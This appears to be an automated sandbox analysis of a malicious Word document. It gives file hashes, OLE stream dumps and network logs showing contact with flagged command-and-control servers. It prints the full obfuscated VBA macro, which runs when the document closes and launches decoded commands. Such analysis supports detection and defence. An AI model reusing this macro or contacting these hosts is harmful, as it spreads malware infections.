                                                                              MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                              SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                              SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                              SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                              Malicious:false
                                                                              Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                              C:\Users\Public\~WRD0000.tmp
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):595972
                                                                              Entropy (8bit):5.85065356609278
                                                                              Encrypted:false
                                                                              SSDEEP:12288:FmkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCY:FmkvVW9gnyQxt9
                                                                              MD5:D631AB4CEFF199B52FF4E4B7AAD0199D
                                                                              SHA1:F30002C31BF32184507182100942A2012F0B8703
                                                                              SHA-256:9DE083F693C144A38D697089F6560A2EFE81B1AD1C5385EC07D6B41BB54B8FFE
                                                                              SHA-512:56B3941CD93658F7DF8976213E2DFD5CB74E7ABB651AD26FDA9B7191E675E03289366B32EEDF68D139562A88DBBAE2589FDA8ABBDB756C43E2E605863459A162
                                                                              Malicious:false
                                                                              Preview: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAApTiijbS9G8G0vRvBtL0bw2bO38GcvRvDZs7XwGi9G8NmztPB1L0bwP0dD8U0vRvA/R0LxYi9G8D9HRfF+L0bwZFfV8GgvRvBtL0fwCS9G8PdGT/FsL0bw90ZG8WwvRvD3RrnwbC9G8G0v0fBsL0bw90ZE8WwvRvBSaWNobS9G8AAAAAAAAAAAUEUAAEwBBQAr7ZhfAAAAAAAAAADgAAIhCwEOEAAUAQAAxAUAAAAAAGR9AAAAEAAAADABAAAAABAAEAAAAAIAAAUAAQAAAAAABQABAAAAAAAAEAcAAAQAAAAAAAADAEABAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAEIUBAEgAAABYhQEAPAAAAACwAQBQQgUAAAAAAAAAAAAAAAAAAAAAAAAABwCIDgAAMHwBADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABofAEAQAAAAAAAAAAAAAAAADABADgBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAGcSAQAAEAAAABQBAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAABkXAAAADABAABeAAAAGAEAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAA6BEAAACQAQAACAAAAHYBAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAFBCBQAAsAEAAEQFAAB+AQAAAAAAAAAAAAAAAABAAABALnJlbG9jAACIDgAAAAAHAAAQAAAAwgYAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                              C:\Users\Public\~WRD0004.tmp
                                                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):595972
                                                                              Entropy (8bit):5.85065356609278
                                                                              Encrypted:false
                                                                              SSDEEP:12288:FmkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCY:FmkvVW9gnyQxt9
                                                                              MD5:D631AB4CEFF199B52FF4E4B7AAD0199D
                                                                              SHA1:F30002C31BF32184507182100942A2012F0B8703
                                                                              SHA-256:9DE083F693C144A38D697089F6560A2EFE81B1AD1C5385EC07D6B41BB54B8FFE
                                                                              SHA-512:56B3941CD93658F7DF8976213E2DFD5CB74E7ABB651AD26FDA9B7191E675E03289366B32EEDF68D139562A88DBBAE2589FDA8ABBDB756C43E2E605863459A162
                                                                              Malicious:false
                                                                              Preview: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAApTiijbS9G8G0vRvBtL0bw2bO38GcvRvDZs7XwGi9G8NmztPB1L0bwP0dD8U0vRvA/R0LxYi9G8D9HRfF+L0bwZFfV8GgvRvBtL0fwCS9G8PdGT/FsL0bw90ZG8WwvRvD3RrnwbC9G8G0v0fBsL0bw90ZE8WwvRvBSaWNobS9G8AAAAAAAAAAAUEUAAEwBBQAr7ZhfAAAAAAAAAADgAAIhCwEOEAAUAQAAxAUAAAAAAGR9AAAAEAAAADABAAAAABAAEAAAAAIAAAUAAQAAAAAABQABAAAAAAAAEAcAAAQAAAAAAAADAEABAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAEIUBAEgAAABYhQEAPAAAAACwAQBQQgUAAAAAAAAAAAAAAAAAAAAAAAAABwCIDgAAMHwBADgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABofAEAQAAAAAAAAAAAAAAAADABADgBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAGcSAQAAEAAAABQBAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAABkXAAAADABAABeAAAAGAEAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAA6BEAAACQAQAACAAAAHYBAAAAAAAAAAAAAAAAAEAAAMAucnNyYwAAAFBCBQAAsAEAAEQFAAB+AQAAAAAAAAAAAAAAAABAAABALnJlbG9jAACIDgAAAAAHAAAQAAAAwgYAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                              Static File Info

                                                                              General

                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: User, Template: Normal.dotm, Last Saved By: kirin, Revision Number: 7, Name of Creating Application: Microsoft Office Word, Total Editing Time: 20:00, Create Time/Date: Sun May 10 01:31:00 2020, Last Saved Time/Date: Wed Oct 28 04:44:00 2020, Number of Pages: 2, Number of Words: 89482, Number of Characters: 510049, Security: 0
                                                                              Entropy (8bit):6.919205506848504
                                                                              TrID:
                                                                              • Microsoft Word document (32009/1) 54.23%
                                                                              • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                              File name:sample1.doc
                                                                              File size:850432
                                                                              MD5:7dbd8ecfada1d39a81a58c9468b91039
                                                                              SHA1:0d21e2742204d1f98f6fcabe0544570fd6857dd3
                                                                              SHA256:dc40e48d2eb0e57cd16b1792bdccc185440f632783c7bcc87c955e1d4e88fc95
                                                                              SHA512:a851ac80b43ebdb8e990c2eb3daabb456516fc40bb43c9f76d0112674dbd6264efce881520744f0502f2962fc0bb4024e7d73ea66d56bc87c0cc6dfde2ab869a
                                                                              SSDEEP:12288:emkTbAui+yjlKtAMgWffRtpqgnydr6YqVPCspBZZLFLIx/mBDOq1a:emkvVW9gnyQxtN9eEBDOQa
                                                                              File Content Preview:........................>.......................g...........j...............Z...[...\...]...^..._...`...a...b...c...d...e...f..................................................................................................................................

                                                                              File Icon

                                                                              Icon Hash:e4eea2aaa4b4b4a4

                                                                              Static OLE Info

                                                                              General

                                                                              Document Type:OLE
                                                                              Number of OLE Files:1

                                                                              OLE File "sample1.doc"

                                                                              Indicators

                                                                              Has Summary Info:True
                                                                              Application Name:Microsoft Office Word
                                                                              Encrypted Document:False
                                                                              Contains Word Document Stream:True
                                                                              Contains Workbook/Book Stream:False
                                                                              Contains PowerPoint Document Stream:False
                                                                              Contains Visio Document Stream:False
                                                                              Contains ObjectPool Stream:
                                                                              Flash Objects Count:
                                                                              Contains VBA Macros:True

                                                                              Summary

                                                                              Code Page:1252
                                                                              Title:
                                                                              Subject:
                                                                              Author:User
                                                                              Keywords:
                                                                              Comments:
                                                                              Template:Normal.dotm
                                                                              Last Saved By:kirin
                                                                              Revion Number:7
                                                                              Total Edit Time:1200
                                                                              Create Time:2020-05-10 00:31:00
                                                                              Last Saved Time:2020-10-28 04:44:00
                                                                              Number of Pages:2
                                                                              Number of Words:89482
                                                                              Number of Characters:510049
                                                                              Creating Application:Microsoft Office Word
                                                                              Security:0

                                                                              Document Summary

                                                                              Document Code Page:1252
                                                                              Number of Lines:4250
                                                                              Number of Paragraphs:1196
                                                                              Thumbnail Scaling Desired:False
                                                                              Company:
                                                                              Contains Dirty Links:False
                                                                              Shared Document:False
                                                                              Changed Hyperlinks:False
                                                                              Application Version:1048576

                                                                              Streams with VBA

                                                                              VBA File Name: ThisDocument.cls, Stream Size: 3696
                                                                              General
                                                                              Stream Path:Macros/VBA/ThisDocument
                                                                              VBA File Name:ThisDocument.cls
                                                                              Stream Size:3696
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . { . . . . . . . . . . . . ' E . . . . . . . . . . . . . . . . . . . ( . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . S l e e p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . .
                                                                              Data Raw:01 16 03 00 00 18 01 00 00 dc 06 00 00 fc 00 00 00 02 02 00 00 ff ff ff ff e3 06 00 00 7b 0b 00 00 00 00 00 00 01 00 00 00 f1 27 45 f5 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 28 00 00 00 00 00 32 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 6c 65 65 70 00 00 00 ff ff ff ff 01 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00

                                                                              VBA Code Keywords

                                                                              Keyword
                                                                              #Else
                                                                              VB_Name
                                                                              VB_Creatable
                                                                              ".pdf"):
                                                                              SetTask(Task
                                                                              VB_Exposed
                                                                              Null,
                                                                              Form_Close()
                                                                              ("doc"):
                                                                              Formt,
                                                                              VB_TemplateDerived
                                                                              Function
                                                                              (ByVal
                                                                              String
                                                                              Right(Range.Text,
                                                                              String)
                                                                              Form_Close
                                                                              Long)
                                                                              Long,
                                                                              VB_Customizable
                                                                              Task,
                                                                              ("xls"):
                                                                              FileName:=STP
                                                                              ".xls
                                                                              PtrSafe
                                                                              Left(ActiveDocument.Paragraphs(One).Range.Text,
                                                                              Declare
                                                                              "ThisDocument"
                                                                              SetTask
                                                                              False
                                                                              FileFormat:=wdFormatText
                                                                              Attribute
                                                                              Private
                                                                              VB_PredeclaredId
                                                                              Sleep
                                                                              VB_GlobalNameSpace
                                                                              VB_Base
                                                                              ".pdf,In")
                                                                              Document_Close()
                                                                              VBA Code
                                                                              Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function Sleep Lib "Kernel32" (ByVal One As Long) As Long
#Else
Private Declare Function Sleep Lib "Kernel32" (ByVal One As Long) As Long
#End If
Private Ms13
Private One As String
Private Two As String
Private STP As String

Private Sub Document_Close()
    Form_Close
End Sub
Private Sub Form_Close()
    STP = Button_Click2(2, 16) + "Ksh1"
    Set Ms13 = CreateObject(Button_Click2(4, 22))
    One = Button_Click2(8, 16)
    Two = Button_Click2(6, 8)
    ActiveDocument.Range(Start:=0, End:=3561).Delete
    SaveAs3 ("xls"): SaveAs3 ("doc"):
    SetTask (One + " " + STP + ".xls " + STP + ".pdf"): Sleep 6000: SetTask (Two + " " + STP + ".pdf,In")
End Sub
Private Function Button_Click2(One As Long, Two As Long) As String
    Button_Click2 = Left(ActiveDocument.Paragraphs(One).Range.Text, Two)
End Function
Private Function Button_Click3(One As Long) As String
     Button_Click3 = Right(Range.Text, One)
End Function
Private Function SaveAs3(Formt As String)
    ActiveDocument.SaveAs2 FileName:=STP + "." + Formt, FileFormat:=wdFormatText
End Function
Private Function SetTask(Task As String)
    Ms13.create Task, Null, Null, act
End Function

                                                                              Streams

                                                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                              General
                                                                              Stream Path:\x1CompObj
                                                                              File Type:data
                                                                              Stream Size:114
                                                                              Entropy:4.2359563651
                                                                              Base64 Encoded:True
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                              General
                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                              File Type:data
                                                                              Stream Size:4096
                                                                              Entropy:0.25569624217
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                              General
                                                                              Stream Path:\x5SummaryInformation
                                                                              File Type:data
                                                                              Stream Size:4096
                                                                              Entropy:0.473780805052
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 4 . . . . . . . @ . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . U s e r . . . . . . . . . . . . . . . . . . . .
                                                                              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 ec 00 00 00 09 00 00 00 fc 00 00 00
                                                                              Stream Path: 1Table, File Type: data, Stream Size: 7386
                                                                              General
                                                                              Stream Path:1Table
                                                                              File Type:data
                                                                              Stream Size:7386
                                                                              Entropy:5.92077573609
                                                                              Base64 Encoded:True
                                                                              Data ASCII:. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                                              Data Raw:1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                                              Stream Path: Data, File Type: data, Stream Size: 187989
                                                                              General
                                                                              Stream Path:Data
                                                                              File Type:data
                                                                              Stream Size:187989
                                                                              Entropy:7.97862280177
                                                                              Base64 Encoded:True
                                                                              Data ASCII:U . . . D . d . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N . . . . . . . . . . . . . . . . . . . C . . . * . . . . A . . . . . . . . . . . . . . . . . . . . . . t . e . m . p . l . a . t . e . . . . . . . . . . . . . . . b . . . . . . . . . . . . b r . . . . 7 . a . _ . . . . . . . . . . . . D . . . . . . . . n . . . . . . . . . b r . . . . 7 . a . _ . . . . P N G . . . . . . . . I H D R . . . O . . . . . . . . . 3 0 . u
                                                                              Data Raw:55 de 02 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 a3 31 e3 1d c3 03 c3 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 4e 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 43 00 0b f0 2a 00 00 00 04 41 01 00 00 00 05 c1 12 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 74 00 65 00
                                                                              Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 367
                                                                              General
                                                                              Stream Path:Macros/PROJECT
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Stream Size:367
                                                                              Entropy:5.29037636248
                                                                              Base64 Encoded:True
                                                                              Data ASCII:I D = " { D 4 7 2 8 3 5 A - 3 8 9 1 - 4 D B 9 - 8 6 F 0 - 0 C 1 2 4 A F F D 6 E 1 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 8 0 A E 9 E F E D E F E D E F E D E F E D " . . D P B = " 9 6 9 4 7 7 F B 8 B 0 7 1 8 0 8 1 8 0 8 1 8 " . . G C = " 2 4 2 6 C 5 8 9 D D 1 6 D E 1 6 D E E 9 " . . . . [ H o s t E x t e n d e r I n f o ]
                                                                              Data Raw:49 44 3d 22 7b 44 34 37 32 38 33 35 41 2d 33 38 39 31 2d 34 44 42 39 2d 38 36 46 30 2d 30 43 31 32 34 41 46 46 44 36 45 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                                                              Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 41
                                                                              General
                                                                              Stream Path:Macros/PROJECTwm
                                                                              File Type:data
                                                                              Stream Size:41
                                                                              Entropy:3.07738448508
                                                                              Base64 Encoded:False
                                                                              Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                                              Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                                                              Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2845
                                                                              General
                                                                              Stream Path:Macros/VBA/_VBA_PROJECT
                                                                              File Type:data
                                                                              Stream Size:2845
                                                                              Entropy:4.32828178006
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                              Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                              Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 513
                                                                              General
                                                                              Stream Path:Macros/VBA/dir
                                                                              File Type:data
                                                                              Stream Size:513
                                                                              Entropy:6.25624133358
                                                                              Base64 Encoded:True
                                                                              Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . Y { . ` . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . m . . .
                                                                              Data Raw:01 fd b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 59 7b a3 60 0a 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                                                                              Stream Path: WordDocument, File Type: data, Stream Size: 627764
                                                                              General
                                                                              Stream Path:WordDocument
                                                                              File Type:data
                                                                              Stream Size:627764
                                                                              Entropy:6.04018774642
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . { . . . . . . . . . . . . . . . . . . . . . . . . - . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . . . . . . f . . . f . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                              Data Raw:ec a5 c1 00 7b 00 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 eb 2d 09 00 0e 00 62 6a 62 6a 84 bd 84 bd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 34 94 09 00 e6 d7 d5 66 e6 d7 d5 66 eb 25 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                              Network Behavior

                                                                              Snort IDS Alerts

                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                              01/14/21-03:27:33.059505TCP2404310ET CNC Feodo Tracker Reported CnC Server TCP group 64917080192.168.2.22177.130.51.198
                                                                              01/14/21-03:27:35.005688ICMP449ICMP Time-To-Live Exceeded in Transit177.130.48.10192.168.2.22
                                                                              01/14/21-03:27:38.007049ICMP449ICMP Time-To-Live Exceeded in Transit177.130.48.10192.168.2.22
                                                                              01/14/21-03:27:42.959734TCP2404346ET CNC Feodo Tracker Reported CnC Server TCP group 24491718080192.168.2.2291.121.87.90
                                                                              01/14/21-03:27:53.647668TCP2404318ET CNC Feodo Tracker Reported CnC Server TCP group 10491748080192.168.2.22188.226.165.170

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 14, 2021 03:27:33.059504986 CET4917080192.168.2.22177.130.51.198
                                                                              Jan 14, 2021 03:27:36.061847925 CET4917080192.168.2.22177.130.51.198
                                                                              Jan 14, 2021 03:27:42.959733963 CET491718080192.168.2.2291.121.87.90
                                                                              Jan 14, 2021 03:27:43.015970945 CET80804917191.121.87.90192.168.2.22
                                                                              Jan 14, 2021 03:27:43.016155958 CET491718080192.168.2.2291.121.87.90
                                                                              Jan 14, 2021 03:27:43.017992973 CET491718080192.168.2.2291.121.87.90
                                                                              Jan 14, 2021 03:27:43.018141031 CET491718080192.168.2.2291.121.87.90
                                                                              Jan 14, 2021 03:27:43.073920012 CET80804917191.121.87.90192.168.2.22
                                                                              Jan 14, 2021 03:27:43.074106932 CET491718080192.168.2.2291.121.87.90
                                                                              Jan 14, 2021 03:27:43.074335098 CET80804917191.121.87.90192.168.2.22
                                                                              Jan 14, 2021 03:27:43.074443102 CET491718080192.168.2.2291.121.87.90
                                                                              Jan 14, 2021 03:27:43.130157948 CET80804917191.121.87.90192.168.2.22
                                                                              Jan 14, 2021 03:27:43.130397081 CET80804917191.121.87.90192.168.2.22
                                                                              Jan 14, 2021 03:27:43.130536079 CET80804917191.121.87.90192.168.2.22
                                                                              Jan 14, 2021 03:27:43.130793095 CET491718080192.168.2.2291.121.87.90
                                                                              Jan 14, 2021 03:27:47.186748981 CET491728080192.168.2.22104.131.144.215
                                                                              Jan 14, 2021 03:27:47.390424967 CET808049172104.131.144.215192.168.2.22
                                                                              Jan 14, 2021 03:27:47.903357983 CET491728080192.168.2.22104.131.144.215
                                                                              Jan 14, 2021 03:27:48.106733084 CET808049172104.131.144.215192.168.2.22
                                                                              Jan 14, 2021 03:27:48.605422020 CET491728080192.168.2.22104.131.144.215
                                                                              Jan 14, 2021 03:27:48.808576107 CET808049172104.131.144.215192.168.2.22
                                                                              Jan 14, 2021 03:27:48.811541080 CET491738080192.168.2.22104.131.144.215
                                                                              Jan 14, 2021 03:27:49.014333010 CET808049173104.131.144.215192.168.2.22
                                                                              Jan 14, 2021 03:27:49.525799990 CET491738080192.168.2.22104.131.144.215
                                                                              Jan 14, 2021 03:27:49.728693962 CET808049173104.131.144.215192.168.2.22
                                                                              Jan 14, 2021 03:27:50.227930069 CET491738080192.168.2.22104.131.144.215
                                                                              Jan 14, 2021 03:27:50.430799961 CET808049173104.131.144.215192.168.2.22
                                                                              Jan 14, 2021 03:27:53.647667885 CET491748080192.168.2.22188.226.165.170
                                                                              Jan 14, 2021 03:27:53.700279951 CET808049174188.226.165.170192.168.2.22
                                                                              Jan 14, 2021 03:27:53.700409889 CET491748080192.168.2.22188.226.165.170
                                                                              Jan 14, 2021 03:27:53.701368093 CET491748080192.168.2.22188.226.165.170
                                                                              Jan 14, 2021 03:27:53.701437950 CET491748080192.168.2.22188.226.165.170
                                                                              Jan 14, 2021 03:27:53.753477097 CET808049174188.226.165.170192.168.2.22
